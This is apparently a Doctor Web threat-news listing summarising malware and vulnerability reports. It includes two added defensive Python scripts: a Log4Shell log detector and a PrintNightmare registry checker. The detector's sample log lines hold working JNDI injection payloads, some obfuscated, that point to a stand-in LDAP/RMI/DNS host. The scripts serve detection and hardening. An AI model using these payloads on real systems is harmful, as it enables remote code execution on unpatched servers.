Study of a targeted attack on a Russian enterprise in the mechanical-engineering sector

In October 2023, Doctor Web was contacted by a Russian mechanical-engineering enterprise that suspected malware was present on one of its computers. Our specialists investigated the incident and determined that the company had been the target of a targeted attack: the attackers had sent phishing emails whose attachment carried the malware responsible for the initial infection and for installing further malicious tools on the system.
11.03.2024 | Real-time threat news

Hidden crypto miner in pirated software makes cybercriminals rich at the expense of their victims

Doctor Web is reporting on an increase in cases of cryptocurrency-mining trojans being found hidden in pirated software that is available in Telegram and on some Internet sites.
15.01.2024 | Real-time threat news

Vulnerability in Openfire messaging software allows unauthorized access to compromised servers

Doctor Web is notifying users about the spread of malicious plugins for the Openfire messaging server. To date, more than 3,000 Openfire servers worldwide have been compromised through a vulnerability that lets attackers access the server's file system and enlist the infected servers in a botnet.
25.09.2023 | Real-time threat news

The art of manipulation: fraudsters steal money with remote administration software for mobile devices

Doctor Web is reporting on the growing number of fraud cases involving remote desktop access applications. RustDesk is the most popular among attackers.
22.09.2023 | Real-time threat news

Android.Spy.Lydia trojans masquerade as an Iranian online trading platform

Doctor Web has detected new versions of the Android.Spy.Lydia trojans, which perform a variety of spyware activities on infected Android devices and give attackers remote-control capabilities for stealing personal information and funds. The trojans also contain an anti-analysis check: if they detect that they are running in an emulator or on a test device, they stop working.
13.09.2023 | Real-time threat news

Pandora's box is now open: the well-known Mirai trojan arrives in a new disguise to Android-based TV sets and TV boxes

Doctor Web has identified a family of Android.Pandora trojans that compromise Android devices, either during firmware updates or when applications for viewing pirated video content are installed. This backdoor inherited its advanced DDoS-attack capabilities from its ancestor, the well-known Linux.Mirai trojan.
06.09.2023 | Real-time threat news

Fruity trojan downloader performs multi-stage infection of Windows computers

Doctor Web has uncovered an attack on Windows users involving a modular downloader trojan dubbed Trojan.Fruity.1. With its help, threat actors can infect computers with different types of malware, depending on the attackers’ goals. To conceal an attack and increase the chances of it being successful, they use a variety of tricks. These include a multi-stage infection process for target systems, using harmless apps for launching components of the trojan, and trying to bypass anti-virus protection.
27.07.2023 | Real-time threat news

Doctor Web identifies pirated Windows builds with crypto stealer that penetrates EFI partition

Doctor Web has discovered a malicious clipper program in a number of unofficial Windows 10 builds that cybercriminals have been distributing via a torrent tracker. Dubbed Trojan.Clipper.231, this trojan replaces cryptocurrency wallet addresses in the clipboard with addresses controlled by the attackers. At the time of writing, the attackers had stolen cryptocurrency worth about US$19,000.
13.06.2023 | Real-time threat news

Android apps containing SpinOk module with spyware features installed over 421,000,000 times

Doctor Web discovered an Android software module with spyware functionality. It collects information about files stored on the device and can transfer them to malicious actors; it can also read the clipboard, upload its contents to a remote server, and replace them. Dubbed Android.Spy.SpinOk in accordance with Dr.Web classification, this module is distributed as a marketing SDK that developers can embed in all sorts of apps and games, including those available on Google Play.
29.05.2023 | Real-time threat news

Linux backdoor malware infects WordPress-based websites

Doctor Web has discovered a malicious Linux program that hacks websites based on the WordPress CMS. It exploits 30 vulnerabilities in a number of plugins and themes for this platform. If a site runs outdated versions of these add-ons that lack the relevant fixes, its pages are injected with malicious JavaScript. As a result, when a visitor clicks anywhere on an attacked page, they are redirected to other sites.
30.12.2022 | Real-time threat news

Android users risk falling victim to fraudsters during online job searches

Doctor Web is alerting users to the emergence of malicious Android apps that attackers have disguised as job-search software. Through these applications, fraudsters can collect their victims’ personal information and steal money from them using deceptive techniques.
21.11.2022 | Real-time threat news

Banking trojans disguised as shopping apps attack Malaysian Android users

Doctor Web reports on the discovery of banking trojan apps that target Malaysian users. Malicious actors distribute them as mobile shopping apps. Unlike many other bankers, these do not merely borrow the icons and names of real stores: they also work like genuine shopping apps in order to look plausible and avoid raising suspicion. The trojans steal logins and passwords for online banking accounts and hijack SMS messages containing the mobile TANs and one-time passwords used to confirm transactions. They also steal victims' personal information, including their date of birth, mobile phone number and identity card number.
19.10.2022 | Real-time threat news

Doctor Web identifies attack on WhatsApp and WhatsApp Business messengers installed on counterfeit Android devices

Doctor Web reports that it has discovered backdoors in the system partition of budget Android devices that are counterfeit versions of well-known brand-name models. These trojans can execute arbitrary code inside the WhatsApp and WhatsApp Business messaging apps and can potentially be used in a number of attack scenarios, including intercepting chats and stealing the confidential information they contain, as well as running spam campaigns and various scam schemes. This is not the only risk to users: the affected devices are advertised as running a modern, secure Android version, but in reality they are based on an obsolete version subject to multiple vulnerabilities.
22.08.2022 | Real-time threat news

Study of an APT attack on a telecommunications company in Kazakhstan

In October 2021, one of Kazakhstan's telecommunications companies contacted Doctor Web on suspicion that malware was present in its corporate network. During the initial examination, we found backdoors that had previously been used only in targeted attacks. The investigation also showed that the company's internal servers had been compromised since 2019. For several years, the attackers' main tools were Backdoor.PlugX.93 and BackDoor.Whitebird.30, the Fast Reverse Proxy (FRP) utilities, and RemCom.
24.03.2022 | Real-time threat news

Mobile device users’ cryptocurrency is at risk

Doctor Web warns on the spread of trojan apps designed to steal cryptocurrency from mobile device users. The malicious software hijacks secret seed phrases that give access to crypto wallets. Users of both Android devices and Apple smartphones are at risk.
21.03.2022 | Real-time threat news

Vulnerabilities in Log4j 2 threaten users

Concerning the dangerous vulnerabilities in the Log4j 2 logging library and related logging components (CVE-2021-44228, CVE-2021-45046, CVE-2021-4104 and CVE-2021-42550), Doctor Web is drawing users' attention to the need to observe protective measures. The library is used for logging in Java projects and is part of the Apache Logging Project. The vulnerabilities allow attackers to execute arbitrary code on the system, cause a denial of service, or disclose confidential information. Even though Apache has already released several patches, installations that have not been updated remain at risk.
27.12.2021 | Real-time threat news
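As an added example (not part of Doctor Web's publication), the following Python script scans web-server log lines for the JNDI lookup strings used to trigger CVE-2021-44228 and CVE-2021-45046. It resolves nested Log4j lookups innermost-first, so obfuscations such as `${${lower:j}ndi:...}` or `${${::-j}${::-n}${::-d}${::-i}:...}` are caught that a plain `${jndi:` string match would miss. The log lines are constructed for the example, the hostnames are documentation addresses, and the resolver handles only the lookup forms commonly seen in attack traffic (`lower:`, `upper:`, `::-` and `key:-default`); anything else is left as an opaque lookup.

```python
"""Offline detector for Log4Shell-style JNDI lookups (CVE-2021-44228 /
CVE-2021-45046) in log lines, including nested-lookup obfuscation.
Added example; not code from Doctor Web or the Log4j project."""
import re

# One innermost lookup: '${' ... '}' containing no nested '${'.
_INNER = re.compile(r"\$\{([^${}]*)\}")
# A lookup we cannot evaluate is frozen as « body » so it is not rescanned.
_JNDI = re.compile(r"«\s*jndi\s*:([^»]*)»", re.I)


def _resolve_inner(body: str):
    """Evaluate one innermost lookup body the way Log4j 2's StrSubstitutor
    would for the forms common in obfuscated payloads. None = unresolvable."""
    if body.startswith("::-"):          # ${::-j}  -> 'j' (empty key, default value)
        return body[3:]
    if body.startswith("lower:"):       # ${lower:J} -> 'j'
        return body[6:].lower()
    if body.startswith("upper:"):       # ${upper:j} -> 'J'
        return body[6:].upper()
    if ":-" in body:                    # ${env:NOPE:-j}, ${sys:nope:-j} -> default 'j'
        return body.split(":-", 1)[1]
    return None                         # jndi:, sys:, date:, ... stay as written


def normalize(line: str, max_rounds: int = 50) -> str:
    """Collapse nested lookups innermost-first, e.g.
    '${${lower:j}ndi:ldap://h/x}' -> '«jndi:ldap://h/x»'.
    max_rounds bounds the loop because a default value may re-create '${'."""
    for _ in range(max_rounds):
        m = _INNER.search(line)
        if not m:
            break
        resolved = _resolve_inner(m.group(1))
        if resolved is None:
            resolved = "«" + m.group(1) + "»"   # freeze the terminal lookup
        line = line[:m.start()] + resolved + line[m.end():]
    return line


def scan(lines):
    """Return [(1-based line number, 'jndi:<scheme>://...'), ...] for every
    line that carries a JNDI lookup after de-obfuscation."""
    hits = []
    for n, raw in enumerate(lines, 1):
        for m in _JNDI.finditer(normalize(raw)):
            hits.append((n, "jndi:" + m.group(1)))
    return hits


# Constructed sample access-log lines (not real traffic); 198.51.100.0/24 is a
# documentation range. Lines 2-5 carry progressively more obfuscated payloads.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:03 +0000] "GET /?x=${${lower:j}ndi:${lower:ldap}://198.51.100.7/b} HTTP/1.1" 404 0',
    '10.0.0.9 - - [10/Dec/2021:12:00:04 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-r}mi://198.51.100.7/c}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:05 +0000] "GET / HTTP/1.1" 200 512 "-" "${${env:NOPE:-j}ndi:dns://198.51.100.7/d}"',
]

if __name__ == "__main__":
    for line_no, lookup in scan(SAMPLE_LOG):
        print(f"line {line_no}: {lookup}")
```

Run it against a real access log with `scan(open(path, errors="replace"))`; every hit is a line worth correlating with outbound LDAP, RMI or DNS connections from the Java host, since a vulnerable Log4j instance would have resolved that lookup when the request was logged.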

New trojan detected on AppGallery app catalog

Doctor Web malware analysts discovered dozens of games on the AppGallery catalog with the Android.Cynos.7.origin trojan built into them. This trojan is designed to collect users' mobile phone numbers. At least 9,300,000 Android device owners have installed these dangerous games.
23.11.2021 | Real-time threat news

The Coper―a new Android banking trojan targeting Colombian users

Doctor Web warns of a newly discovered family of Android banking trojans dubbed Android.BankBot.Coper. The malicious apps have a modular architecture and a multi-stage infection mechanism. They also have several protective techniques helping them withstand removal attempts. That allows the trojans to stay active longer and perform more successful attacks. All known Coper banker trojan modifications target Colombian users to date. However, new versions targeting users from other countries are likely to emerge over time.
21.07.2021 | Real-time threat news

About protecting against break-ins via the Windows PrintNightmare vulnerability

In connection with the critical Windows Print Spooler vulnerabilities detected in June, CVE-2021-1675 and CVE-2021-34527 (widely known as PrintNightmare), Doctor Web is drawing users' attention to the need to observe protective measures. Although Microsoft has since patched both vulnerabilities, CVE-2021-34527 remains exploitable, letting attackers penetrate a system and execute arbitrary code with elevated privileges (NT AUTHORITY\SYSTEM), if an administrator weakens certain Point and Print settings in the Windows registry.
15.07.2021 | Real-time threat news
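As an added example, not from Doctor Web or Microsoft, this Python snippet encodes the Point and Print registry values that Microsoft's mitigation guidance for CVE-2021-34527 says must stay at their safe defaults, and reports any that have been weakened. The function and constant names are this example's own, the sample value dictionaries are constructed, and the live registry read only works on Windows (the assessment logic itself runs anywhere, so it can also be applied to values collected by other tooling).

```python
r"""Report Point and Print registry settings that reopen CVE-2021-34527
(PrintNightmare) on a Windows host that already has the July 2021 fix.
Added example; not code from Doctor Web or Microsoft.

Per Microsoft's mitigation guidance for CVE-2021-34527, under
HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint:
  NoWarningNoElevationOnInstall               must be 0 or absent
  UpdatePromptSettings                        must be 0 or absent
  RestrictDriverInstallationToAdministrators  must be 1 (the later default) or absent
"""
import sys

POINT_AND_PRINT_KEY = r"SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint"
VALUE_NAMES = (
    "NoWarningNoElevationOnInstall",
    "UpdatePromptSettings",
    "RestrictDriverInstallationToAdministrators",
)


def assess_point_and_print(values):
    """values maps value name -> DWORD; a missing name means the value is absent.
    Returns one finding per weakened setting; [] means the safe configuration."""
    findings = []
    v = values.get("NoWarningNoElevationOnInstall")
    if v not in (None, 0):
        findings.append(f"NoWarningNoElevationOnInstall={v}: elevation prompt for "
                        "driver installation is suppressed; set to 0 or delete")
    v = values.get("UpdatePromptSettings")
    if v not in (None, 0):
        findings.append(f"UpdatePromptSettings={v}: driver-update prompt is "
                        "suppressed; set to 0 or delete")
    v = values.get("RestrictDriverInstallationToAdministrators")
    if v == 0:
        findings.append("RestrictDriverInstallationToAdministrators=0: "
                        "non-administrators may install print drivers; set to 1")
    return findings


def read_point_and_print():
    """Read the live values on Windows. An absent key or value is returned as
    None, which assess_point_and_print() treats as the safe default."""
    if sys.platform != "win32":
        raise RuntimeError("live registry read requires Windows")
    import winreg  # Windows-only standard-library module
    values = dict.fromkeys(VALUE_NAMES)
    try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, POINT_AND_PRINT_KEY) as key:
            for name in VALUE_NAMES:
                try:
                    values[name] = winreg.QueryValueEx(key, name)[0]
                except FileNotFoundError:
                    pass  # value not defined
    except FileNotFoundError:
        pass  # policy key not present at all: all defaults
    return values


# Constructed sample configurations (not read from any real host).
SAFE_SAMPLE = {"NoWarningNoElevationOnInstall": 0, "UpdatePromptSettings": 0}
WEAK_SAMPLE = {"NoWarningNoElevationOnInstall": 1, "UpdatePromptSettings": 2,
               "RestrictDriverInstallationToAdministrators": 0}

if __name__ == "__main__":
    values = read_point_and_print() if sys.platform == "win32" else WEAK_SAMPLE
    for finding in assess_point_and_print(values) or ["Point and Print settings are at the safe defaults"]:
        print(finding)
```

On a Windows host the script must run with rights to read HKLM; on any other platform it evaluates the constructed weak sample so the output of the assessment logic can be seen. Note that the check only covers the registry side of the July 2021 guidance; installing the update itself remains the prerequisite.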

Android trojans steal Facebook users’ logins and passwords

Doctor Web’s malware analysts have discovered malicious apps on Google Play that steal Facebook users’ logins and passwords. These stealer trojans were spread as harmless software and were installed more than 5,856,010 times.
01.07.2021 | Real-time threat news

Trojan detected in APKPure Android app store client software

Doctor Web specialists have discovered a malicious functionality in APKPure—the official client application of the popular third-party Android app store. The trojan built into it downloads and installs various apps, including other malware, without users’ permission.
09.04.2021 | Real-time threat news

Malware found on the AppGallery app store for the first time

Doctor Web's virus analysts have uncovered the first malware on AppGallery, the official app store of the Android device manufacturer Huawei. The apps turned out to be dangerous Android.Joker trojans whose primary function is to subscribe users to premium mobile services. In total, our specialists found that 10 modifications of these trojans had made their way onto AppGallery, with more than 538,000 users having installed them.
07.04.2021 | Real-time threat news

Study of targeted attacks on Russian research institutes

02.04.2021 | Real-time threat news

Study of the Spyder modular backdoor for targeted attacks

In December 2020, the Doctor Web virus laboratory was contacted by a telecommunications company based in Central Asia after its employees discovered suspicious files on their corporate network. During the examination, our analysts extracted and studied a malicious sample, which turned out to be one of the backdoors used by the hacker group known as Winnti.
04.03.2021 | Real-time threat news